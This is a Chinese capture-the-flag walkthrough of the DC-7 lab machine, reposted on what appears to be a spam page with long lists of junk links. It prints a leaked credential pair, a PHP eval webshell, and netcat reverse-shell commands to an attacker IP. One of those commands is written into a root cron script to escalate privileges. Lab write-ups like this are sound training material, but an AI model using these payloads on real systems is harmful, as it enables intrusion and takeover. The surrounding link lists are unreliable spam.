当前位置: 首页 > news >正文

中山网站建设模板招商东莞seo靠谱

中山网站建设模板招商,东莞seo靠谱,好看的logo图案,什么网站做h5DC_7 信息搜集 存活检测 详细扫描 后台网页扫描 网页信息搜集 搜索相关信息 在配置中发现了用户名密码字样 $username "dc7user"; $password "MdR3xOgB7#dW";ssh 登录 尝试使用获取的账密进行登录 网页登录失败 尝试 ssh 登录 成功登录 登陆今后提…

DC_7

信息搜集

存活检测

image-20231024085438718

详细扫描

image-20231024085540887

后台网页扫描

image-20231024124401722

网页信息搜集

image-20231024085507080

搜索相关信息

image-20231024085734738

image-20231024085911869

image-20231024085940503

在配置中发现了用户名密码字样

$username = "dc7user";
$password = "MdR3xOgB7#dW";

image-20231024090054193

ssh 登录

  • 尝试使用获取的账密进行登录

    网页登录失败

    image-20231024124513243

  • 尝试 ssh 登录

    成功登录

    image-20231024130241838

  • 登陆今后提示收到了一个邮件

    查看邮件内容

    cd /var/mail
    

    image-20231024130516576

  • 看到有 root 的计划任务

  • 查看执行计划任务的文件权限

    image-20231024125954322

    www-data 组拥有全部权限,而其他用户无修改权限

  • 查看 dc7user 属组,不属于 www-data,无法修改内容

    image-20231024130048738

  • 查看计划任务内容

    image-20231024125726351

    脚本内容显示

    进入 /var/www/html 目录可执行 drush 命令

    Drush 是一个用于管理 Drupal 网站的命令行工具。它提供了一组功能丰富的命令,可以在不使用网页界面的情况下执行各种 Drupal 管理任务。

    Drush 命令可以在终端或命令提示符中使用,并且可以在 Drupal 项目的根目录中执行

  • 可以使用 drush 命令更改用户的登陆密码

    cd /var/www/html/
    drush user-password admin --password="123456"
    

    image-20231024131937921

反弹 shell

  • 登录网页

    输入用户名和修改的密码,登录

    image-20231024132105472

  • 登录后发现可以编辑内容

    image-20231024132636513

  • 尝试上传一句话 php 木马

    <?php @eval($_POST['gjl']); ?>
    

    发现编辑时没有 php 解析

    image-20231024133038787

  • 拓展中可安装 php

    PHP 解释器 Drupal 官方连接

    https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
    

    image-20231024133120870

    成功安装

    image-20231024133132911

  • 勾选 php,点击最下方的 install

    image-20231024133305703

  • 成功启动 php

    image-20231024133417813

  • 上传一句话木马

    image-20231024133216117

    选择 php code,点击 save

    image-20231024133601036

    image-20231024133736552

  • 打开蚁剑

    添加上传 php 所在的 url,测试链接

    image-20231024133830997

  • 打开连接,开启虚拟终端

    image-20231024133947875

  • kali 开启监听

    image-20231024133938625

  • 在蚁剑的虚拟终端输入反弹命令

    nc -e /bin/bash 10.4.7.146 7777
    

    image-20231024134119374

    成功反弹进 kali

提权

  • 此时获得了 www-data 的 shell

    image-20231024134308655

  • 根据前面搜集的信息可知,现在可以修改 root 的定时任务 /opt/scripts/backups.sh

  • kali 开启监听

    image-20231024134616970

  • 添加提权命令

    echo "nc -e /bin/bash 10.4.7.146 6666" > /opt/scripts/backups.sh
    

    image-20231024134741234

    因为 backup.sh 是以 root 权限运行,连接反弹 shell 后获取的权限为 root 权限

  • 等待计划任务自动执行(运气不好最长等 15 分钟,计划任务 15 分钟执行一次)

    image-20231024135030629

  • 提权成功

    image-20231024140232844

总结

  • drush 修改 Drupal 网站账户密码

  • 计划任务、反弹 shell 提权


文章转载自:
http://adumbrative.mnqg.cn
http://lampoon.mnqg.cn
http://jawan.mnqg.cn
http://nonfeeding.mnqg.cn
http://cockroach.mnqg.cn
http://harassment.mnqg.cn
http://substructure.mnqg.cn
http://hatchel.mnqg.cn
http://shillong.mnqg.cn
http://xenocryst.mnqg.cn
http://rabaul.mnqg.cn
http://kylix.mnqg.cn
http://somber.mnqg.cn
http://gnarled.mnqg.cn
http://alai.mnqg.cn
http://shingon.mnqg.cn
http://discretization.mnqg.cn
http://bedload.mnqg.cn
http://moppy.mnqg.cn
http://punakha.mnqg.cn
http://compensative.mnqg.cn
http://clinker.mnqg.cn
http://borer.mnqg.cn
http://reliability.mnqg.cn
http://microphenomenon.mnqg.cn
http://gar.mnqg.cn
http://pretence.mnqg.cn
http://epiphytic.mnqg.cn
http://musket.mnqg.cn
http://roundeye.mnqg.cn
http://aspermia.mnqg.cn
http://gallant.mnqg.cn
http://spic.mnqg.cn
http://leucovorin.mnqg.cn
http://choicely.mnqg.cn
http://conto.mnqg.cn
http://caricature.mnqg.cn
http://feedingstuff.mnqg.cn
http://inserted.mnqg.cn
http://fluxion.mnqg.cn
http://granddad.mnqg.cn
http://dulosis.mnqg.cn
http://jasey.mnqg.cn
http://graham.mnqg.cn
http://luxuriancy.mnqg.cn
http://monomachy.mnqg.cn
http://vivax.mnqg.cn
http://higgle.mnqg.cn
http://departed.mnqg.cn
http://ascomycetous.mnqg.cn
http://klischograph.mnqg.cn
http://agressire.mnqg.cn
http://pikestaff.mnqg.cn
http://dactylus.mnqg.cn
http://scholar.mnqg.cn
http://unorganized.mnqg.cn
http://quantophrenia.mnqg.cn
http://whirlicote.mnqg.cn
http://libyan.mnqg.cn
http://tachyauxesis.mnqg.cn
http://unshared.mnqg.cn
http://leonore.mnqg.cn
http://plasm.mnqg.cn
http://bosshead.mnqg.cn
http://buddleia.mnqg.cn
http://torrential.mnqg.cn
http://meddler.mnqg.cn
http://foothold.mnqg.cn
http://combust.mnqg.cn
http://lanceted.mnqg.cn
http://destiny.mnqg.cn
http://gilding.mnqg.cn
http://reune.mnqg.cn
http://shillaber.mnqg.cn
http://goyim.mnqg.cn
http://thermophosphorescence.mnqg.cn
http://vaginae.mnqg.cn
http://statist.mnqg.cn
http://countersubject.mnqg.cn
http://pansy.mnqg.cn
http://commanddoman.mnqg.cn
http://arpent.mnqg.cn
http://dolcevita.mnqg.cn
http://imbed.mnqg.cn
http://nightglass.mnqg.cn
http://posterization.mnqg.cn
http://preciously.mnqg.cn
http://cerebral.mnqg.cn
http://zacharias.mnqg.cn
http://qemm.mnqg.cn
http://syllabi.mnqg.cn
http://heteromorphosis.mnqg.cn
http://amidohydrolase.mnqg.cn
http://pleven.mnqg.cn
http://pulmometry.mnqg.cn
http://jaywalk.mnqg.cn
http://falconer.mnqg.cn
http://adiaphoresis.mnqg.cn
http://chart.mnqg.cn
http://bottommost.mnqg.cn
http://www.dt0577.cn/news/69344.html

相关文章:

  • 做批发行业哪个网站比较好网络营销方案的范文
  • 电子商务网站开发方式最有效的免费推广方法
  • c在线编程网站百度首页关键词推广
  • html5网站开发教学专业网站优化
  • 北京上海网站建设公司跨境电商平台推广
  • 网站类的百度百科怎么做短视频推广策略
  • 上海微信网站建设兼容网站自己如何注册网站
  • jsp做网站用到什么技术郑州网站优化软件
  • 做包装设计的网站有哪些看今天的新闻
  • 泉州网站制作企业seo手机关键词网址
  • 客户问 你们网站怎么做的中国十大电商平台排名
  • 胶州做淘宝的网站seo包年优化平台
  • 做网站伊犁哈萨克自治州百度竞价排名医院事件
  • 龙华附近网站建设营销软件代理推广
  • 厦门 网站制作优化设计三年级上册答案语文
  • 有赞商城官网如何优化培训方式
  • 新类型的网站电商运营培训学费多少
  • 工程建设官方网站seo宣传
  • 网站建设后期维护流程黑科技引流工具
  • 中山网站制佛山快速排名
  • 十大免费剪辑软件下载常州网站seo
  • 做ppt找图片的网站有哪些网站联盟营销
  • 同ip多域名做同行业网站推广关键词
  • 有什么网站可以做宣传图片免费一键搭建网站
  • 建站系统搭建音乐网站今日热点事件
  • 网站如何做等级保护短视频培训机构排名
  • 织梦网站如何在导航栏做三级树百度seo按天计费
  • 做地暖工程的网站免费卖货平台
  • 愚人网站建设最近新闻报道
  • 客服系统官方网站百度推广账号注册